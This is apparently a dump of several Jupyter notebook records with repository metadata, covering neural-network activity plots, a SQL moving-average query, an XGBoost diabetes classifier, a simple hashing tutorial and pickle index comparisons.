"_____no_output_____"
],
[
"num_rand_orthogonal = np.prod(analyzer.model.get_input_shape()[1:])\nnum_imgs = int(228**2)\nset_norm_activity(\n analyzer=analyzer_list[0],\n target_neuron_idx=0,#np.random.choice(range(analyzer.model.get_num_latent()), 1),\n num_rand_orthogonal=num_rand_orthogonal,\n orthogonal_idx=np.random.choice(range(1, num_rand_orthogonal), 1),\n num_imgs=num_imgs)",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n num_plots_y = 1\n num_plots_x = 2\n gs1 = gridspec.GridSpec(num_plots_y, num_plots_x, wspace=0.3, width_ratios=[4, 1])\n fig = plt.figure(figsize=(6,6))\n curve_ax = pf.clear_axis(fig.add_subplot(gs1[0]))\n #cmap = plt.get_cmap('tab20b')\n cmap = plt.get_cmap('viridis')\n vmin = np.floor(np.min(analyzer.norm_activity))#0.0\n vmax = np.ceil(np.max(analyzer.norm_activity))#1.0\n \n #name_suffix = \"continuous\"\n #pts = curve_ax.scatter(analyzer.proj_datapoints[:,0], analyzer.proj_datapoints[:,1],\n # vmin=vmin, vmax=vmax, cmap=cmap, alpha=0.5, c=analyzer.norm_activity[:, analyzer.bf_id0], s=5.0)\n \n norm_activity = analyzer.norm_activity[:, analyzer.bf_id0]\n norm_activity = norm_activity.reshape(int(np.sqrt(num_imgs)), int(np.sqrt(num_imgs)))\n \n levels = 5\n name_suffix = \"\"\n contsf = curve_ax.contourf(analyzer.X_mesh, analyzer.Y_mesh, norm_activity,\n levels=levels, vmin=vmin, vmax=vmax, alpha=1.0, antialiased=True, cmap=cmap)\n \n curve_ax.arrow(0, 0, analyzer.proj_neuron0[0].item(), analyzer.proj_neuron0[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')\n curve_ax.arrow(0, 0, analyzer.proj_neuron1[0].item(), analyzer.proj_neuron1[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='w', ec='k')\n \n curve_ax.set_ylim([-2, 2.0])\n curve_ax.set_xlim([-2, 2.0])\n curve_ax.set_aspect(\"equal\")\n curve_ax.set_title(\"Neuron ID \"+str(analyzer.bf_id0), fontsize=16)\n \n gs2 = gridspec.GridSpecFromSubplotSpec(2, 1, gs1[1], hspace=-0.5)\n bf1_ax = pf.clear_axis(fig.add_subplot(gs2[0]))\n bf1_ax.imshow(analyzer.neuron_vis_output[\"optimal_stims\"][analyzer.bf_id0][step_idx].reshape((28,28)),\n cmap=\"Greys_r\")\n bf1_ax.set_title(\"Primary\\n Stimulus\", color='r', fontsize=16)\n \n activity_ax = fig.add_subplot(gs2[1])\n activity_ax.plot(norm_activity[0,:], color='k')\n activity_ax.set_aspect(1.0/activity_ax.get_data_ratio())\n activity_ax.set_title(\"Activity along\\nstimulus vector\")\n \n fig.savefig(analyzer.analysis_out_dir+\"/vis/neuron_response_contours_bf0id\"+str(analyzer.bf_id0)+name_suffix+\".png\",\n transparent=True, bbox_inches=\"tight\", pad_inches=0.01)\n plt.show()",
"_____no_output_____"
],
[
"def set_norm_activity(analyzer, target_neuron_idx, num_orth_directions,\n orthogonal_idx, num_imgs, orth_neuron_indices=None):\n\n # Get alt vectors\n #for orth_idx in range(num_orth_directions):\n # if alt_neuron_indices is None: # find random orthogonal indices\n # tmp_bf1 = find_orth_vect(alt_vectors)\n # else: # use other pre-images as starting point for orthogonal indices\n # tmp_bf1 = analyzer.neuron_vis_output[\"optimal_stims\"][alt_neuron_indices[pop_idx]][step_idx]\n # tmp_bf1 /= np.linalg.norm(tmp_bf1)\n # alt_vectors = np.append(alt_vectors, tmp_bf1[:,None], axis=1)\n\n # Construct point dataset\n x_pts = np.linspace(-0.5, 5.0, int(np.sqrt(num_imgs)))\n y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))\n analyzer.X_mesh, analyzer.Y_mesh = np.meshgrid(x_pts, y_pts)\n analyzer.proj_datapoints = np.stack([analyzer.X_mesh.reshape(num_imgs),\n analyzer.Y_mesh.reshape(num_imgs)], axis=1)\n \n # Compute projection matrix to inject the point dataset into image space\n proj_matrix, v = analyzer.bf_projections(analyzer.bf0, np.squeeze(alt_vectors[:, orthogonal_idx]))\n analyzer.proj_neuron0 = np.dot(proj_matrix, analyzer.bf0).T\n analyzer.proj_neuron1 = np.dot(proj_matrix, np.squeeze(alt_vectors[:, orthogonal_idx])).T\n \n orth_datapoints = None#np.stack([np.dot(proj_matrix.T, v)])\n #for orth_id in range(num_orth_directions)], axis=0)\n \n datapoints = np.stack([np.dot(proj_matrix.T, analyzer.proj_datapoints[data_id,:])\n for data_id in range(num_imgs)]) #inject\n datapoints, orig_shape = dp.reshape_data(datapoints, flatten=False)[:2]\n datapoints = {\"test\": Dataset(datapoints, lbls=None,\n ignore_lbls=None, rand_state=analyzer.rand_state)}\n #params={\"whiten_data\":analyzer.model_params.whiten_data}\n #if params[\"whiten_data\"]:\n # params[\"whiten_method\"] = analyzer.model_params.whiten_method\n #datapoints = analyzer.model.preprocess_dataset(datapoints, params=params)\n datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)\n datapoints[\"test\"].images = (\n (datapoints[\"test\"].images - np.min(datapoints[\"test\"].images, axis=1, keepdims=True))\n / (np.max(datapoints[\"test\"].images, axis=1, keepdims=True) - np.min(datapoints[\"test\"].images, axis=1, keepdims=True)))\n #datapoints[\"test\"].images /= np.max(np.abs(datapoints[\"test\"].images))\n #datapoints[\"test\"].images *= analyzer.analysis_params.input_scale*3\n \n activations = analyzer.compute_activations(datapoints[\"test\"].images)#, batch_size=num_imgs//16)\n activity_max = np.amax(np.abs(activations))\n analyzer.norm_activity = activations / (activity_max + 0.00001) # Rescale between -1 and 1\n \n return orth_datapoints",
"_____no_output_____"
],
[
"def get_norm_activity(analyzer, bf0, alt_vectors, num_imgs):\n # Construct point dataset\n x_pts = np.linspace(-0.5, 5.0, int(np.sqrt(num_imgs)))\n y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))\n X_mesh, Y_mesh = np.meshgrid(x_pts, y_pts)\n proj_datapoints = np.stack([X_mesh.reshape(num_imgs), Y_mesh.reshape(num_imgs)], axis=1)\n \n out_dict = {\n \"norm_activity\": [],\n \"proj_neuron0\": [],\n \"proj_neuron1\": [],\n \"proj_v\": [],\n \"proj_datapoints\": proj_datapoints,\n \"X_mesh\": X_mesh,\n \"Y_mesh\": Y_mesh}\n\n for alt_vector_idx in range(alt_vectors.shape[1]):\n alt_vector = alt_vectors[:, alt_vector_idx]\n proj_matrix, v = dp.bf_projections(bf0, alt_vector)\n out_dict[\"proj_neuron0\"].append(np.dot(proj_matrix, bf0).T) #project\n out_dict[\"proj_neuron1\"].append(np.dot(proj_matrix, alt_vector).T) #project\n out_dict[\"proj_v\"].append(np.dot(proj_matrix, v).T) #project\n \n datapoints = np.stack([np.dot(proj_matrix.T, proj_datapoints[data_id,:])\n for data_id in range(num_imgs)]) #inject\n datapoints = dp.reshape_data(datapoints, flatten=False)[0]\n datapoints = {\"test\": Dataset(datapoints, lbls=None, ignore_lbls=None,\n rand_state=analyzer.rand_state)}\n \n # preprocess_dataset should include rescaling to be between (0,1) for mnist\n params={\"whiten_data\":analyzer.model_params.whiten_data}\n if params[\"whiten_data\"]:\n params[\"whiten_method\"] = analyzer.model_params.whiten_method\n datapoints = analyzer.model.preprocess_dataset(datapoints, params=params)\n datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)\n datapoints[\"test\"].images = (\n (datapoints[\"test\"].images - np.min(datapoints[\"test\"].images, axis=1, keepdims=True))\n / (np.max(datapoints[\"test\"].images, axis=1, keepdims=True) - np.min(datapoints[\"test\"].images, axis=1, keepdims=True)))\n #datapoints[\"test\"].images /= np.max(np.abs(datapoints[\"test\"].images))\n #datapoints[\"test\"].images *= analyzer.analysis_params.input_scale*3\n \n activations = analyzer.compute_activations(datapoints[\"test\"].images)#, batch_size=num_imgs//16)\n activity_max = np.amax(np.abs(activations))\n out_dict[\"norm_activity\"].append(activations / (activity_max + 0.00001)) # Rescale between -1 and 1\n \n return out_dict",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"raw",
"code",
"markdown",
"code",
"raw"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"raw"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"raw",
"raw",
"raw",
"raw",
"raw"
]
] |
cb28fd4b4aa7c7dcf414b66a9679119b0c8e659a | 7,773 | ipynb | Jupyter Notebook | 15_moving_averages.ipynb | mnrclab/Advanced_SQL_TimeSeries | 395c97f01bf003e5c661c36e1b81589b2341fb17 | [
"Unlicense"
] | null | null | null | 15_moving_averages.ipynb | mnrclab/Advanced_SQL_TimeSeries | 395c97f01bf003e5c661c36e1b81589b2341fb17 | [
"Unlicense"
] | null | null | null | 15_moving_averages.ipynb | mnrclab/Advanced_SQL_TimeSeries | 395c97f01bf003e5c661c36e1b81589b2341fb17 | [
"Unlicense"
] | null | null | null | 33.649351 | 108 | 0.33655 | [
[
[
"sql(\n '''\n SELECT\n Order_Date,\n Product_ID, \n Sub_Category,\n Quantity,\n ROUND(Profit, 2) AS Profit,\n ROUND(SUM(Profit) OVER(ORDER BY Order_Date ROWS BETWEEN UNBOUNDED PRECEDING AND\n CURRENT ROW), 2) AS Cummulative_SUM_Profit,\n ROUND(AVG(Profit) OVER(ORDER BY Order_Date ROWS BETWEEN UNBOUNDED PRECEDING AND\n CURRENT ROW), 2) AS Cummulative_AVG_Profit\n FROM superstore;\n '''\n)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb292121b25ac33c7811e623e53872a36c5f15bf | 73,384 | ipynb | Jupyter Notebook | Projects in Python with Scikit-Learn- XGBoost- Pandas- Statsmodels- etc./Diabetes Diagnosis (XGBoost).ipynb | RooHashemi/Data-Science-Projects-with-Python-Spark-Keras_TensorFlow-AWS | 18b689decaed259a26ef7b9a8f894752acb567a9 | [
"MIT"
] | 2 | 2019-01-02T02:50:29.000Z | 2020-06-16T12:32:37.000Z | Projects in Python with Scikit-Learn- XGBoost- Pandas- Statsmodels- etc./Diabetes Diagnosis (XGBoost).ipynb | RooHashemi/Data-Science-Projects-with-Python-Spark-Keras_TensorFlow-AWS | 18b689decaed259a26ef7b9a8f894752acb567a9 | [
"MIT"
] | null | null | null | Projects in Python with Scikit-Learn- XGBoost- Pandas- Statsmodels- etc./Diabetes Diagnosis (XGBoost).ipynb | RooHashemi/Data-Science-Projects-with-Python-Spark-Keras_TensorFlow-AWS | 18b689decaed259a26ef7b9a8f894752acb567a9 | [
"MIT"
] | null | null | null | 101.21931 | 18,892 | 0.807111 | [
[
[
"# Data description & Problem statement: \nThis dataset is originally from the National Institute of Diabetes and Digestive and Kidney Diseases. The objective of the dataset is to diagnostically predict whether or not a patient has diabetes, based on certain diagnostic measurements included in the dataset. Several constraints were placed on the selection of these instances from a larger database. In particular, all patients here are females at least 21 years old of Pima Indian heritage.\n\nThe type of dataset and problem is a classic supervised binary classification. Given a number of elements all with certain characteristics (features), we want to build a machine learning model to identify people affected by type 2 diabetes.\n\n\n# Workflow:\n- Load the dataset, and define the required functions (e.g. for detecting the outliers)\n- Data Cleaning/Wrangling: Manipulate outliers, missing data or duplicate values, Encode categorical variables, etc.\n- Split data into training & test parts (utilize the training part for training & hyperparameter tuning of model, and test part for the final evaluation of model)\n # Model Training:\n- Build an initial XGBoost model, and evaluate it via C-V approach\n- Use grid-search along with C-V approach to find the best hyperparameters of XGBoost model: Find the best XGBoost model (Note: I've utilized SMOTE technique via imblearn toolbox to synthetically over-sample the minority category and even the dataset imbalances.)\n # Model Evaluation: \n- Evaluate the best XGBoost model with optimized hyperparameters on Test Dataset, by calculating:\n - AUC score\n - Confusion matrix\n - ROC curve \n - Precision-Recall curve \n - Average precision\n \nFinally, calculate the Feature Importance. ",
"_____no_output_____"
]
],
[
[
"import sklearn\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import preprocessing\n%matplotlib inline\n\nfrom scipy import stats\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")",
"_____no_output_____"
],
[
"# Function to remove outliers (all rows) by Z-score: \ndef remove_outliers(X, y, name, thresh=3):\n L=[]\n for name in name:\n drop_rows = X.index[(np.abs(X[name] - X[name].mean()) >= (thresh * X[name].std()))]\n L.extend(list(drop_rows))\n \n X.drop(np.array(list(set(L))), axis=0, inplace=True)\n y.drop(np.array(list(set(L))), axis=0, inplace=True)\n print('number of outliers removed : ' , len(L))",
"_____no_output_____"
],
[
"df=pd.read_csv('C:/Users/rhash/Documents/Datasets/pima-indian-diabetes/indians-diabetes.csv') \n\ndf.columns=['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age', 'Class']\n\n# To Shuffle the data:\nnp.random.seed(42)\ndf=df.reindex(np.random.permutation(df.index))\ndf.reset_index(inplace=True, drop=True)\n\ndf.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 768 entries, 0 to 767\nData columns (total 9 columns):\nNP 768 non-null int64\nGC 768 non-null int64\nBP 768 non-null int64\nST 768 non-null int64\nI 768 non-null int64\nBMI 768 non-null float64\nPF 768 non-null float64\nAge 768 non-null int64\nClass 768 non-null int64\ndtypes: float64(2), int64(7)\nmemory usage: 54.1 KB\n"
],
[
"df['ST'].replace(0, df[df['ST']!=0]['ST'].mean(), inplace=True)\ndf['GC'].replace(0, df[df['GC']!=0]['GC'].mean(), inplace=True)\ndf['BP'].replace(0, df[df['BP']!=0]['BP'].mean(), inplace=True)\ndf['BMI'].replace(0, df[df['BMI']!=0]['BMI'].mean(), inplace=True)\ndf['I'].replace(0, df[df['I']!=0]['I'].mean(), inplace=True)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"X=df.drop('Class', axis=1)\ny=df['Class']\n\n# We initially devide data into training & test folds: We do the Grid-Search only on training part \nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42, stratify=y)\n\n#remove_outliers(X_train, y_train, ['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age'], thresh=5)",
"_____no_output_____"
],
[
"# Building the Initial Model & Cross-Validation: \nimport xgboost\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import StratifiedKFold\n\nmodel=XGBClassifier() \nkfold=StratifiedKFold(n_splits=4, shuffle=True, random_state=42)\nscores=cross_val_score(model, X_train, y_train, cv=kfold)\n\nprint(scores, \"\\n\")\nprint(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))",
"[0.75172414 0.77083333 0.76388889 0.79020979] \n\nAccuracy: 0.77 (+/- 0.01)\n"
],
[
"# Grid-Search for the best model parameters: \n\n# We create a sample_weight list for this imbalanced dataset:\nfrom sklearn.utils.class_weight import compute_sample_weight\nsw=compute_sample_weight(class_weight='balanced', y=y_train)\n\n\nfrom sklearn.model_selection import GridSearchCV\nparam={'max_depth':[2, 4, 6, 8], 'min_child_weight':[1, 2, 3], 'gamma': [ 0, 0.05, 0.1], 'subsample':[0.7, 1]}\n\nkfold=StratifiedKFold(n_splits=3, shuffle=True, random_state=42)\ngrid_search=GridSearchCV(XGBClassifier(), param, cv=kfold, n_jobs=-1, scoring=\"roc_auc\")\ngrid_search.fit(X_train, y_train, sample_weight=sw)\n\n# Grid-Search report: \nG=pd.DataFrame(grid_search.cv_results_).sort_values(\"rank_test_score\")\nG.head(3)",
"_____no_output_____"
],
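[
"# A hedged aside, not part of the original run: the workflow notes above mention SMOTE from the\n# imblearn toolbox for over-sampling the minority class, while the cell above balances the classes\n# with sample weights instead. A minimal sketch, assuming imblearn is installed; X_res and y_res\n# are illustrative names only.\nfrom imblearn.over_sampling import SMOTE\nX_res, y_res = SMOTE(random_state=42).fit_resample(X_train, y_train)\n# The same grid search could then be fitted on the over-sampled data instead of using sample_weight:\n# grid_search.fit(X_res, y_res)",
"_____no_output_____"
],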
[
"print(\"Best parameters: \", grid_search.best_params_)\nprint(\"Best validation accuracy: %0.2f (+/- %0.2f)\" % (np.round(grid_search.best_score_, decimals=2), np.round(G.loc[grid_search.best_index_,\"std_test_score\" ], decimals=2)))\nprint(\"Test score: \", np.round(grid_search.score(X_test, y_test),2))",
"Best parameters: {'gamma': 0, 'max_depth': 2, 'min_child_weight': 1, 'subsample': 1}\nBest validation accuracy: 0.82 (+/- 0.02)\nTest score: 0.82\n"
],
[
"from sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report\n\n# Plot a confusion matrix.\n# cm is the confusion matrix, names are the names of the classes.\ndef plot_confusion_matrix(cm, names, title='Confusion matrix', cmap=plt.cm.Blues):\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(names))\n plt.xticks(tick_marks, names, rotation=45)\n plt.yticks(tick_marks, names)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\nnames = [\"0\", \"1\"]\n\n# Compute confusion matrix\ncm = confusion_matrix(y_test, grid_search.predict(X_test))\nnp.set_printoptions(precision=2)\nprint('Confusion matrix, without normalization')\nprint(cm)\n\n# Normalize the confusion matrix by row (i.e by the number of samples in each class)\ncm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\nprint('Normalized confusion matrix')\nprint(cm_normalized)\nplt.figure()\nplot_confusion_matrix(cm_normalized, names, title='Normalized confusion matrix')\n\nplt.show()",
"Confusion matrix, without normalization\n[[92 33]\n [22 45]]\nNormalized confusion matrix\n[[0.74 0.26]\n [0.33 0.67]]\n"
],
[
"# Classification report:\nreport=classification_report(y_test, grid_search.predict(X_test))\nprint(report)",
" precision recall f1-score support\n\n 0 0.81 0.74 0.77 125\n 1 0.58 0.67 0.62 67\n\navg / total 0.73 0.71 0.72 192\n\n"
],
[
"# ROC curve & auc:\nfrom sklearn.metrics import precision_recall_curve, roc_curve, roc_auc_score, average_precision_score\n\nfpr, tpr, thresholds=roc_curve(np.array(y_test),grid_search.predict_proba(X_test)[:, 1] , pos_label=1)\nroc_auc=roc_auc_score(np.array(y_test), grid_search.predict_proba(X_test)[:, 1])\n\nplt.figure()\n\nplt.step(fpr, tpr, color='darkorange', lw=2, label='ROC curve (auc = %0.2f)' % roc_auc)\nplt.plot([0, 1], [0, 1], color='navy', alpha=0.4, lw=2, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC curve')\nplt.legend(loc=\"lower right\")\n\nplt.plot([cm_normalized[0,1]], [cm_normalized[1,1]], 'or')\nplt.show()",
"_____no_output_____"
],
[
"# Precision-Recall trade-off:\nprecision, recall, thresholds=precision_recall_curve(y_test,grid_search.predict_proba(X_test)[:, 1], pos_label=1)\nave_precision=average_precision_score(y_test,grid_search.predict_proba(X_test)[:, 1])\n\nplt.step(recall, precision, color='navy')\n\nplt.xlabel('Recall')\nplt.ylabel('Precision')\nplt.xlim([0, 1.001])\nplt.ylim([0, 1.02])\nplt.title('Precision-Recall curve: AP={0:0.2f}'.format(ave_precision))\n\nplt.plot([cm_normalized[1,1]], [cm[1,1]/(cm[1,1]+cm[0,1])], 'ob')\nplt.show()",
"_____no_output_____"
],
[
"# Feature Importance:\nim=XGBClassifier().fit(X,y).feature_importances_\n\n# Sort & Plot:\nd=dict(zip(np.array(X.columns), im))\nk=sorted(d,key=lambda i: d[i], reverse= True)\n[print((i,d[i])) for i in k]\n\n# Plot:\nc1=pd.DataFrame(np.array(im), columns=[\"Importance\"])\nc2=pd.DataFrame(np.array(X.columns[0:8]),columns=[\"Feature\"])\n\nfig, ax = plt.subplots(figsize=(8,6)) \nsns.barplot(x=\"Feature\", y=\"Importance\", data=pd.concat([c2,c1], axis=1), color=\"blue\", ax=ax)",
"('PF', 0.18965517)\n('GC', 0.18275861)\n('BMI', 0.1724138)\n('I', 0.13103448)\n('Age', 0.112068966)\n('NP', 0.0862069)\n('ST', 0.077586204)\n('BP', 0.048275862)\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2921df64543f64348ea7501c33c9f846c34d43 | 7,292 | ipynb | Jupyter Notebook | Untitled.ipynb | rajharshiitb/FEVEROUS | 817750a6d9993c95253a33c7289d1ce3e85f145c | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | rajharshiitb/FEVEROUS | 817750a6d9993c95253a33c7289d1ce3e85f145c | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | rajharshiitb/FEVEROUS | 817750a6d9993c95253a33c7289d1ce3e85f145c | [
"Apache-2.0"
] | 1 | 2021-12-21T04:44:47.000Z | 2021-12-21T04:44:47.000Z | 19.602151 | 313 | 0.485464 | [
[
[
"import numpy as np",
"_____no_output_____"
],
[
"index1 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/idxv1.pkl\",allow_pickle=True)\nindex2 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/idxv2.pkl\",allow_pickle=True)\nindex3 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/worker1_0.pkl\",allow_pickle=True)\nindex4 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/worker1_1.pkl\",allow_pickle=True)",
"_____no_output_____"
],
[
"index1 = index1\nindex2 = index2",
"_____no_output_____"
],
[
"common = list(set(index1.keys()).intersection(set(index2.keys())))",
"_____no_output_____"
],
[
"len(index3)",
"_____no_output_____"
],
[
"len(index4)",
"_____no_output_____"
],
[
"len(set(index2.keys()).intersection(set(index3.keys())))",
"_____no_output_____"
],
[
"len(common)",
"_____no_output_____"
],
[
"print(len(index1),len(index2))",
"16658 16659\n"
],
[
"count = 0\nv1 = 0\nv2 = 0\nfor ent in common:\n list1 = set(index1[ent])\n list2 = set(index2[ent])\n v1 += len(list1)\n v2 += len(list2)\n inter = list1.intersection(list2)\n count += abs(len(inter)-max(len(list1),len(list2)))\nprint(count)",
"17\n"
],
[
"count = 0\nv2 = 0\nv3 = 0\nfor ent in common:\n list3 = set(index3[ent])\n list2 = set(index2[ent])\n v3 += len(list3)\n v2 += len(list2)\n inter = list3.intersection(list2)\n count += abs(len(inter)-max(len(list3),len(list2)))\nprint(count)",
"0\n"
],
[
"print(v3,v2)",
"68294 68294\n"
],
[
"index1['Human Rights Campaign']",
"_____no_output_____"
],
[
"index2['Foundation (evidence)']",
"_____no_output_____"
],
[
"index.keys()",
"_____no_output_____"
],
[
"index['Dot-com company']",
"_____no_output_____"
],
[
"index_fast = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/idx_fast.pkl\",allow_pickle=True)",
"_____no_output_____"
],
[
"index_fast.keys()",
"_____no_output_____"
],
[
"index_fast['Pepco Holdings']",
"_____no_output_____"
],
[
"len(index_fast)",
"_____no_output_____"
],
[
"len(index)",
"_____no_output_____"
],
[
"index4['Dot-com company']",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2937ea3487eef252e8dcaae63858237600049b | 26,425 | ipynb | Jupyter Notebook | Hashing_and_Collisions_notebook.ipynb | ARU-Bioinf-CMA-2020/tw1_hashing_collisions | bcccbf0bde545c4ef1ab3a5a4d955efaa2a7c95c | [
"Apache-2.0"
] | null | null | null | Hashing_and_Collisions_notebook.ipynb | ARU-Bioinf-CMA-2020/tw1_hashing_collisions | bcccbf0bde545c4ef1ab3a5a4d955efaa2a7c95c | [
"Apache-2.0"
] | null | null | null | Hashing_and_Collisions_notebook.ipynb | ARU-Bioinf-CMA-2020/tw1_hashing_collisions | bcccbf0bde545c4ef1ab3a5a4d955efaa2a7c95c | [
"Apache-2.0"
] | null | null | null | 91.753472 | 18,108 | 0.848817 | [
[
[
"# Simple Hashing and Collisions",
"_____no_output_____"
],
[
"This is a very simple example of hashing based on the modulo function and neglecting the issue of collisions mentioned in the lecture.",
"_____no_output_____"
],
[
"## Introduction",
"_____no_output_____"
],
[
"Good hashing approaches are available in Python for the *Dictionary* data type. However here is a demonstration of a simple hashing function. The data values have actually been chosen to avoid collisions for the initial size for the hash table. \nIn this example the data values are their own keys.",
"_____no_output_____"
],
[
"## A simple hash function",
"_____no_output_____"
]
],
[
[
"data = [8, 17, 27, 30, 55, 56, 57, 60, 1001, 1002]",
"_____no_output_____"
]
],
[
[
"Some of the values are closely spaced in value. The aim is spread them through the hash table in an apparently random way. \nThe hash table is initially loaded with placeholder 'None' values.\nThe chosen size is 17 for the demo.",
"_____no_output_____"
]
],
[
[
"hash_table = [None] * 17\ntableLength = len(hash_table)",
"_____no_output_____"
]
],
[
[
"The hash function is the modulo (remainder) of the data value devided by the length of the hash_table.",
"_____no_output_____"
]
],
[
[
"def hash_function(value, table_size):\n return value % table_size",
"_____no_output_____"
]
],
[
[
"The data values can now be distributed in the hash_table using the hash_function. ",
"_____no_output_____"
]
],
[
[
"for value in data:\n hash_table[hash_function(value, tableLength)] = value",
"_____no_output_____"
]
],
[
[
"Here they are, notice the function has distributed them through the table.",
"_____no_output_____"
]
],
[
[
"print(hash_table)",
"[17, None, None, None, 55, 56, 57, None, 8, 60, 27, None, None, 30, None, 1001, 1002]\n"
]
],
[
[
"A value can be retrieved from the table by applying the hash function - but in this case they are their own keys so it does not appear very useful.",
"_____no_output_____"
]
],
[
[
"print(hash_table[hash_function(27, tableLength)])",
"27\n"
]
],
[
[
"There is not much space for addtional values in this case without collisions. These occur when the hash_function for a new key is the same as an existing one.\n,\nOne way to minimize collisions is to make a better choice for the hashing function. For example it might be better to use a large prime number for the modulo function function in preference to the tableLength value *e.g.* for a 1000-slot table use the prime 997. \n\nA completely functional hash_table would have one of the methods for dealing with a collision. The overhead in dealing with collisions will decrease the hashing performance from its initial O(1). For retrieving data the process is slowed up by the added steps when a slot has been assigned to multiple data values. \n\nThe overhead increases as the *'load factor'* for the hash table increases. The *load factor* (often called $\\alpha$) is the proportion of the slots that have values loaded into them. \n\nSo for the demo with initial valuesabove there are 9 data values in 15 slots: so that is a load value of 9/15 or 0.60.\n\nFor the simple linear addressing method of dealing with collisions the big O performance of the hashing varies as:\n\n$O$ = 1+(1/(1-$\\alpha$)<sup>2</sup>)\n\n(ref. Sedgewick, R. (2003) Linear probing. p615, *Algorthims in Java*, Addison Wesley) \n\nFor low $\\alpha$, such as occurs with small numbers of data elements in a large hashing table the O(1) performance will be not degraded by the 1-$\\alpha$)<sup>2</sup>) term in this expression.\n\n**To see the form of this expression with increasing $\\alpha$ your job is to plot the function as the load factor approaches 1. You should do this with matlibplot. The next section shows you how to plot a function.**\n",
"_____no_output_____"
],
[
"## Plotting a function with matlibplot\n\nThis is simple example showing how we can plot the function $y$ = $x$<sup>2</sup> for $x$ in the range 0 to 4:",
"_____no_output_____"
]
],
[
[
"# This line configures matplotlib to show figures embedded in the notebook\n# It uses the IPython inline 'magic' syntax\n%matplotlib inline\n# standard import\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
],
[
"x = np.linspace(start=-4., stop=4.) # Return evenly spaced numbers over a specified interval.\ny = x**2\nplt.figure()\nplt.plot(x,y)\nplt.title('a quadratic function')\nplt.xlabel('x axis label')\nplt.ylabel('y axis label')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Your task\nPlot how the $O$ the big O performance of the hashing with the load factor $\\alpha$ according to the Sedgewick formulae above.\n\nConsider what is a good range to use for $\\alpha$ in the plot and make sure you label both the plot and the axes.\n\nPlease note that you will need to have produced the plot to answer question 12 of the \n<a href='https://canvas.anglia.ac.uk/courses/15139/assignments/88350'>TW1 quiz</a>",
"_____no_output_____"
]
],
[
[
"# your code for the plot",
"_____no_output_____"
]
],
[
[
"You should notice that the plot shows that linear addressing has a strikingly non-linear loss of performance as the hash table load factor increases. \n\nHowever, a small load factor is also an inefficient use of memory space. So as a result, many more sophisticated methods of dealing with collision have been devised which have better performance at higher load factors.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2940a0e0b24da4f99902c84799372dd73b157c | 1,979 | ipynb | Jupyter Notebook | 5-European_GeoJSON.ipynb | VasavanThiru/ipy-pandas-leaflet | b307669b03ba8a07535cd0ad1eb65a0a504c78fb | [
"MIT"
] | null | null | null | 5-European_GeoJSON.ipynb | VasavanThiru/ipy-pandas-leaflet | b307669b03ba8a07535cd0ad1eb65a0a504c78fb | [
"MIT"
] | null | null | null | 5-European_GeoJSON.ipynb | VasavanThiru/ipy-pandas-leaflet | b307669b03ba8a07535cd0ad1eb65a0a504c78fb | [
"MIT"
] | null | null | null | 24.432099 | 129 | 0.528044 | [
[
[
